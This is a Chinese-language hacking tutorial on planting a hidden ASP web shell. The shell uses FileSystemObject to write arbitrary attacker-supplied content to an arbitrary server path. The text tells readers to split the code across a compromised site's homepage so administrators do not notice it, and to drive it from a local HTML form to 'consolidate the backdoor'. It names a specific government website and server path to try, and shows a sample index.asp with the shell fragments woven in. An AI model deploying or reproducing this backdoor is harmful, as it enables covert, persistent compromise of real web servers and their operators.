1.随便找他一个页面,然后把如下内容分开插入到它的主页了,注意一下上下文。内容(fso):
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
最好要分开插入!!
这样管理员也不容易发现。
2.
将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路径就好了。你要知道路径!!内容:
注:此方法为巩固后门使用!!!
有人说不行????
大家可以把上内容的action改成"http://www.bjhi.gov.cn/web/biaozhun/index.asp";
路径添"E:\inetpub\bjhi\web\biaozhun\xxxx.asp"
试下
最后用"http://www.bjhi.gov.cn/web/biaozhun/xxxx.asp";访问看看!!
改后的index.asp:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
![]("../biaozhun/images/a_r2_c1.jpg") |
![]("../biaozhun/images/a_r2_c3.jpg") |
![]("images/a_r2_c3.jpg") |
资讯信息 | 广告宣传 | 网上培训 | 标准规范 | 邮箱期刊 | 技术服务 | 企业上网 | 信息互动 | |
| 你的位置:>> 综合主页 >> 标准规范 |
| <% fdata = request("cyfddata") %> <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %> <% objCountFile.Write fdata %> |
![]("images/biaozhun.jpg") |
| &nbs<% if err =0 then %> <% response.write "save Success!" %> <% else %> <% response.write "Save UnSuccess!" %> <% end if %>p; |
<% end if %> <% objCountFile.Close %> <% Set objCountFile=Nothing %> <% Set objFSO = Nothing %> <% set rs=server.createobject("adodb.recordset") rs.open "select * from border",conn,1,1%> <% err.clear %> |
|